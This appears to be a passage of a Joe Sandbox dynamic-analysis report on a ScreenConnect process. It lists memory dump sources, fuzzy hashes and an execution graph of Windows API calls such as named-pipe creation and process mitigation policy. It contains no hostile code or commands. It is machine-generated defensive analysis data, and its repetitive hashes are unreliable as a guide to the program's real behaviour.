                                                                                  • Opcode Fuzzy Hash: 21242431a41157fbc46fcd2eb36f8876219042511ad6dc03b96fa7d2b2762b18
                                                                                  • Instruction Fuzzy Hash: 53F03072505248BFCF02CFA0D904A997FB6EB15300F048095E90587211D7319A21EB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4b687977bbfd2660f93030e06015b3d636698db5b03929495c81dc84e97f50ad
                                                                                  • Instruction ID: e4e1a2c6fbe3f5b30f8d88c7aca471857c37ebcb4c8db446d3625a51c3693a7f
                                                                                  • Opcode Fuzzy Hash: 4b687977bbfd2660f93030e06015b3d636698db5b03929495c81dc84e97f50ad
                                                                                  • Instruction Fuzzy Hash: 6CD0123260531687E7249FFEE800395B79ADF84362F14853BA58CD6568E576998187C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ebebe7c5dd8f49dbc8361e73b739ce2c90b700d5ccf8b313185b33b5992c9a7b
                                                                                  • Instruction ID: 082b3f4e43ec7ba6e0ae27e18a13988994f98a4adeeb70b1699688d8f40aaf1c
                                                                                  • Opcode Fuzzy Hash: ebebe7c5dd8f49dbc8361e73b739ce2c90b700d5ccf8b313185b33b5992c9a7b
                                                                                  • Instruction Fuzzy Hash: E5E012BA44D5845FC711CB64EDA18EC7F30EE16255712449BE146C7573D612BC47CB41
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction ID: 985db1b58953d4533c62bb9c2d4240dec9fa128d45a7b5b4acf33d29468dbedf
                                                                                  • Opcode Fuzzy Hash: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction Fuzzy Hash: 0DE0E535E1030D8ACB01DBA4E8416DDFB71FF86311F504256E50577110E7712AD9CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction ID: 985db1b58953d4533c62bb9c2d4240dec9fa128d45a7b5b4acf33d29468dbedf
                                                                                  • Opcode Fuzzy Hash: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction Fuzzy Hash: 0DE0E535E1030D8ACB01DBA4E8416DDFB71FF86311F504256E50577110E7712AD9CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction ID: 985db1b58953d4533c62bb9c2d4240dec9fa128d45a7b5b4acf33d29468dbedf
                                                                                  • Opcode Fuzzy Hash: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction Fuzzy Hash: 0DE0E535E1030D8ACB01DBA4E8416DDFB71FF86311F504256E50577110E7712AD9CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 87f546848ee865390dceac3bc72bae8cf20a52ec21f7ba823e3f503724c8a090
                                                                                  • Instruction ID: c8ed198840367538c61ef0b43d6c859acdd9fac7919b2f2f036319c76d946826
                                                                                  • Opcode Fuzzy Hash: 87f546848ee865390dceac3bc72bae8cf20a52ec21f7ba823e3f503724c8a090
                                                                                  • Instruction Fuzzy Hash: 95E026316093D86FC7028B50BC189987F34EF56210B04809AE949CB253CA218923D791
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction ID: 985db1b58953d4533c62bb9c2d4240dec9fa128d45a7b5b4acf33d29468dbedf
                                                                                  • Opcode Fuzzy Hash: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction Fuzzy Hash: 0DE0E535E1030D8ACB01DBA4E8416DDFB71FF86311F504256E50577110E7712AD9CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57c1cf63fc299307ebf18d02f80b41b6f2cced649ef1ed1ce25a1b985062d86b
                                                                                  • Instruction ID: 80a892b646fe789da9c2529c8f90237f39041004d6a8f1c9404e95ce17563562
                                                                                  • Opcode Fuzzy Hash: 57c1cf63fc299307ebf18d02f80b41b6f2cced649ef1ed1ce25a1b985062d86b
                                                                                  • Instruction Fuzzy Hash: 8AE0C232506343CBD7249BA9E4503D4BF62DF00321F28467BE1488B56AD5618985CBC1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction ID: 985db1b58953d4533c62bb9c2d4240dec9fa128d45a7b5b4acf33d29468dbedf
                                                                                  • Opcode Fuzzy Hash: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction Fuzzy Hash: 0DE0E535E1030D8ACB01DBA4E8416DDFB71FF86311F504256E50577110E7712AD9CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction ID: 985db1b58953d4533c62bb9c2d4240dec9fa128d45a7b5b4acf33d29468dbedf
                                                                                  • Opcode Fuzzy Hash: d26aca10c8f411fe5eac41ed3582c684bc45c6f620bfb98c000f12e782f9279e
                                                                                  • Instruction Fuzzy Hash: 0DE0E535E1030D8ACB01DBA4E8416DDFB71FF86311F504256E50577110E7712AD9CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a6cd0c3c112beeb8fd160628650d147b0c1ccb1e5a2c456bff0f25f58471adf1
                                                                                  • Instruction ID: 0c2a785d97c8a85195b55a1da5987b6e2e6d4cd71e1c044dec8b5d46fc6f4067
                                                                                  • Opcode Fuzzy Hash: a6cd0c3c112beeb8fd160628650d147b0c1ccb1e5a2c456bff0f25f58471adf1
                                                                                  • Instruction Fuzzy Hash: 92D012787142078F6F059E6A9450533B3AAAB8864A364C869F806C3304FB20FC1685A0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9e531c7556f3d527dcef1ec037cf9e2717eba03a4d407757c40db45949829b8d
                                                                                  • Instruction ID: fba1df006ee47b4d62fcc1013010dd0c3d3c4d475ad279116ed82f1df4468255
                                                                                  • Opcode Fuzzy Hash: 9e531c7556f3d527dcef1ec037cf9e2717eba03a4d407757c40db45949829b8d
                                                                                  • Instruction Fuzzy Hash: D6B092311502088F82009B58D444C0073A8AB08A243010090E1088B232C621FC018A40
                                                                                  APIs
                                                                                  • RtlGetVersion.NTDLL(0000009C), ref: 01074DBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2591191092.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1070000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID: `Q_q
                                                                                  • API String ID: 1889659487-1832742057
                                                                                  • Opcode ID: a6f219468b00c7f2668d964f353e52334e9dce2559e9209101eecf57f1ca40bb
                                                                                  • Instruction ID: e38d95a20020cdf458eae16ccd353952ca11c458b1944ffdac0d2033a37eb4e7
                                                                                  • Opcode Fuzzy Hash: a6f219468b00c7f2668d964f353e52334e9dce2559e9209101eecf57f1ca40bb
                                                                                  • Instruction Fuzzy Hash: 83213670905228EFEB60DF29DC44B99FBB9FB04310F1081D9D15CA7240C7756A88CF96

                                                                                  Execution Graph

                                                                                  Execution Coverage:12.7%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:11
                                                                                  Total number of Limit Nodes:1
                                                                                  execution_graph 7939 7ffe7cdd591f 7940 7ffe7cdd592c CreateNamedPipeW 7939->7940 7941 7ffe7cdd59b3 7940->7941 7942 7ffe7cdd59f1 7943 7ffe7cdd59ff ConnectNamedPipe 7942->7943 7945 7ffe7cdd5ad2 7943->7945 7946 7ffe7cdb8052 7948 7ffe7cdb8059 7946->7948 7947 7ffe7cdb8082 7948->7947 7949 7ffe7cdb80f6 SetProcessMitigationPolicy 7948->7949 7950 7ffe7cdb8152 7949->7950
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 665eb6dbd86e6abfef520f16f65f4e342166b8e9b9817b82a1da33cf804f631b
                                                                                  • Instruction ID: 1de1e7a743e3f5140f19714192f69293bf88c47bf8fcb6ceb2627e7e1be6a789
                                                                                  • Opcode Fuzzy Hash: 665eb6dbd86e6abfef520f16f65f4e342166b8e9b9817b82a1da33cf804f631b
                                                                                  • Instruction Fuzzy Hash: B2C19636A6CE064EE7B9E76980657F962D3FF98304F945139D12EC72F2ED28B8458340

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: |$h|
                                                                                  • API String ID: 0-3504529780
                                                                                  • Opcode ID: 911bde6d70f0d87d21364456a3016301278cd97252ae541808b1a667e0671076
                                                                                  • Instruction ID: 5a48e914c515d4c9cbbebc43ea9db429c75f287795c36e68465f60c73ac36471
                                                                                  • Opcode Fuzzy Hash: 911bde6d70f0d87d21364456a3016301278cd97252ae541808b1a667e0671076
                                                                                  • Instruction Fuzzy Hash: 58E0BF21B78E0E4BEBA8EB6C445667572C5FF9878076505B5D519C3395ED14EC024244

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDB3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDB3000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdb3000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: MitigationPolicyProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1088084561-0
                                                                                  • Opcode ID: cb347b3fe7f345d461c12b923815b260a50eb28a0e76f6dd08e9163337a858e4
                                                                                  • Instruction ID: bc7f5107f1260b900ddaef92165fd0c5932acd8f1e3b42a9e9bba21466040a71
                                                                                  • Opcode Fuzzy Hash: cb347b3fe7f345d461c12b923815b260a50eb28a0e76f6dd08e9163337a858e4
                                                                                  • Instruction Fuzzy Hash: AF41363191CB494FDB14AFAC984A5FA7BE0EF55310F04017FE18AC3662DF68A8468B91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 109 7ffe7cdd59f1-7ffe7cdd59fd 110 7ffe7cdd5a08-7ffe7cdd5ad0 ConnectNamedPipe 109->110 111 7ffe7cdd59ff-7ffe7cdd5a07 109->111 115 7ffe7cdd5ad8-7ffe7cdd5b20 call 7ffe7cdd5b21 110->115 116 7ffe7cdd5ad2 110->116 111->110 116->115
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDD3000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdd3000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConnectNamedPipe
                                                                                  • String ID:
                                                                                  • API String ID: 2191148154-0
                                                                                  • Opcode ID: 13f93ac197282c8031facfaef3e5077f9ec29eece7dcf5503945b738592e7509
                                                                                  • Instruction ID: bfb2a09606b98137901e57ef9718f21497ded7a23732e184e8b945f262352071
                                                                                  • Opcode Fuzzy Hash: 13f93ac197282c8031facfaef3e5077f9ec29eece7dcf5503945b738592e7509
                                                                                  • Instruction Fuzzy Hash: 7641B071D08A5D8FDB58EF98C889BE9BBF0FB55310F0082ABD449D7256DB70A845CB81

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 120 7ffe7cdd591f-7ffe7cdd59b1 CreateNamedPipeW 122 7ffe7cdd59b9-7ffe7cdd59ec 120->122 123 7ffe7cdd59b3 120->123 123->122
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDD3000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdd3000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateNamedPipe
                                                                                  • String ID:
                                                                                  • API String ID: 2489174969-0
                                                                                  • Opcode ID: 9ba8abac1a288fc0460bffdcf957c31e577cdbac261d108f261373ff52bae225
                                                                                  • Instruction ID: 4a1751a8c272ecc29ae4b1a748625bd8f6e509374937d0d8fb8f6ffffd347789
                                                                                  • Opcode Fuzzy Hash: 9ba8abac1a288fc0460bffdcf957c31e577cdbac261d108f261373ff52bae225
                                                                                  • Instruction Fuzzy Hash: D6216B7191CB588FDB58DF1CA842B98BBE0FB59724F04819EE04DD3652CB35A855CBC2

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 214 7ffe7cdbc2b7-7ffe7cdbc2c9 215 7ffe7cdbc2fb-7ffe7cdbc31b 214->215 216 7ffe7cdbc2cb-7ffe7cdbc2e0 214->216 220 7ffe7cdbc31d-7ffe7cdbc3c6 call 7ffe7cdbb1e8 215->220 217 7ffe7cdbc2f4-7ffe7cdbc2f9 216->217 218 7ffe7cdbc2e2-7ffe7cdbc2e3 216->218 217->215 218->217
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: p|
                                                                                  • API String ID: 0-125452795
                                                                                  • Opcode ID: 59b707a40b2762c47cabba0d6ff22e405daf3c49732186ea9d66856574a25f7a
                                                                                  • Instruction ID: c99128a8cf4c188b70d96c2cd7d5e09afdaaa9c14a27354108aa2e9f95e048e9
                                                                                  • Opcode Fuzzy Hash: 59b707a40b2762c47cabba0d6ff22e405daf3c49732186ea9d66856574a25f7a
                                                                                  • Instruction Fuzzy Hash: E331073111DA8D8FCB49EF78C845DA6BBA0FF59308B1405DDD54ACF192CA35E946C740

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 224 7ffe7d0c6266-7ffe7d0c626c call 7ffe7d0c0a08 227 7ffe7d0c6273-7ffe7d0c627e 224->227 228 7ffe7d0c6321-7ffe7d0c6327 227->228 229 7ffe7d0c6284-7ffe7d0c629c 227->229 230 7ffe7d0c632d-7ffe7d0c6335 228->230 231 7ffe7d0c697e-7ffe7d0c6991 228->231 229->228 235 7ffe7d0c62a2-7ffe7d0c62a7 229->235 233 7ffe7d0c6337-7ffe7d0c6338 230->233 234 7ffe7d0c637d-7ffe7d0c6385 230->234 233->234 234->231 236 7ffe7d0c638b-7ffe7d0c638c 234->236 235->228 236->231
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Sf
                                                                                  • API String ID: 0-3514195558
                                                                                  • Opcode ID: 4aa65099188534cbbc150b56c511c35ee67bcd324043782dcaf514610ebb336a
                                                                                  • Instruction ID: 31ecaeae4706037ad4e3847e7110edee1004b1d6cac695116439db3ea58cad4e
                                                                                  • Opcode Fuzzy Hash: 4aa65099188534cbbc150b56c511c35ee67bcd324043782dcaf514610ebb336a
                                                                                  • Instruction Fuzzy Hash: 40019E3252C61D4EE7A8EA6894493F433D2FB44311F90A13DC48E821A2FD796482C381

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 250 7ffe7cdbb62c-7ffe7cdbb63a 251 7ffe7cdbb63c 250->251 251->251 252 7ffe7cdbb63e-7ffe7cdbb64b 251->252 254 7ffe7cdbb74d-7ffe7cdbb768 call 7ffe7cdbb7c6 252->254 255 7ffe7cdbb651-7ffe7cdbb656 252->255 258 7ffe7cdbb76a-7ffe7cdbb76b 254->258 259 7ffe7cdbb76e-7ffe7cdbb76f 254->259 255->254 258->259
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `O|
                                                                                  • API String ID: 0-726885568
                                                                                  • Opcode ID: 8ab859cebca72375576aec4a43b6f5abe8c2c76b2c93044e241f6fb96def0043
                                                                                  • Instruction ID: 5d1e865cdafb78d2260018d6578c4d4e003716fff6e9952e356f6c4caa48c484
                                                                                  • Opcode Fuzzy Hash: 8ab859cebca72375576aec4a43b6f5abe8c2c76b2c93044e241f6fb96def0043
                                                                                  • Instruction Fuzzy Hash: F2F0C275A5C94A9FEBD5EE2C841536973C1EF55314F59109CCAADCB2E1CE6ABC018304

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: c?
                                                                                  • API String ID: 0-478642629
                                                                                  • Opcode ID: fb2cba84a14c1e1a3d0a45386cea683c798ff977539dede19a3d8840bcd8b5be
                                                                                  • Instruction ID: 4d26b0f9a11caff3c630352635950314caf1ebb992b92a982fa1ca931da12230
                                                                                  • Opcode Fuzzy Hash: fb2cba84a14c1e1a3d0a45386cea683c798ff977539dede19a3d8840bcd8b5be
                                                                                  • Instruction Fuzzy Hash: 0CE09233A2D2058AE7289F14A4022F87752FB42325F04117AC49B6A492EB5AA49787C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: c?
                                                                                  • API String ID: 0-478642629
                                                                                  • Opcode ID: fbb38aa4e67f7e99068521d7b86e666754d07f315ef3e942cd73b296490df82d
                                                                                  • Instruction ID: abaa9031015156b4e3504853937ae8916ac9edff9c8e842ff4a283cf7292197b
                                                                                  • Opcode Fuzzy Hash: fbb38aa4e67f7e99068521d7b86e666754d07f315ef3e942cd73b296490df82d
                                                                                  • Instruction Fuzzy Hash: A6D0A710E1450106E655DF1480013B9A5837F44300F400078C40DAB6D3DF7CE4868381
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0x|
                                                                                  • API String ID: 0-886835361
                                                                                  • Opcode ID: 4e80dc464426607cc769061dd235d8a95f178738c8d8081b6da4d4bf98aac86f
                                                                                  • Instruction ID: 7c8d1201ecbaec8a1f1e6600fc93327cfc48af4060753632cd46cfb528961294
                                                                                  • Opcode Fuzzy Hash: 4e80dc464426607cc769061dd235d8a95f178738c8d8081b6da4d4bf98aac86f
                                                                                  • Instruction Fuzzy Hash: 41A00205B789991A6285EA6C001A27520C7EB991417A540355A1DC23AADD2898838284
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: +fN_^
                                                                                  • API String ID: 0-739507246
                                                                                  • Opcode ID: 1a0386615a049b09c90ae75754e4d5120a116c20038ec1e3d7a6d9e97a7d0dc2
                                                                                  • Instruction ID: fd91e75d6cdc01a6e9c13152760aac0ced8d7bff5f1a2e159a370397075fd790
                                                                                  • Opcode Fuzzy Hash: 1a0386615a049b09c90ae75754e4d5120a116c20038ec1e3d7a6d9e97a7d0dc2
                                                                                  • Instruction Fuzzy Hash: 74A00201B6980D0A62C8EA2C047B27941D7A7A8181BB54175665DD22AADC29E8520200
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ec76e11d8129ed05326d50c1658769a1ce0b592f5c61e7e4d9ef2ed405a929de
                                                                                  • Instruction ID: 45070f4d8634d3e7959ed9a577d1a794742a531fd66489f91a4d6e449c02e582
                                                                                  • Opcode Fuzzy Hash: ec76e11d8129ed05326d50c1658769a1ce0b592f5c61e7e4d9ef2ed405a929de
                                                                                  • Instruction Fuzzy Hash: 8AA19271A2CA0A4FEBA8EB5CC451BA533D3FF58305F544278E56DD72A2EE28F8418740
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4b23cbad4e7953a3a9a9513ac0d00cb2c671475c837471d149529f1af307eaac
                                                                                  • Instruction ID: 5b6b0e69dceaa1792ad9cb78bda559fbe17b265930e4bb7498e11e1279d2ea05
                                                                                  • Opcode Fuzzy Hash: 4b23cbad4e7953a3a9a9513ac0d00cb2c671475c837471d149529f1af307eaac
                                                                                  • Instruction Fuzzy Hash: C081F836A6CA164FFBB99A1884553F533D3EF45310F9512B9C86EC71E6EE28BC028351
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1d9a4e81824443cc0c46fead7b26c47758013085afd44a5d633f7f3620ce85b4
                                                                                  • Instruction ID: 8f8d03515ab49e208e0f8e067fd2ce490887d76ab2f5257743a77667896c02ac
                                                                                  • Opcode Fuzzy Hash: 1d9a4e81824443cc0c46fead7b26c47758013085afd44a5d633f7f3620ce85b4
                                                                                  • Instruction Fuzzy Hash: DA710C71628A0A8FEBB8EB5CC491BE533D6FF58305F541178E56ED72A2EE64F8018740
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
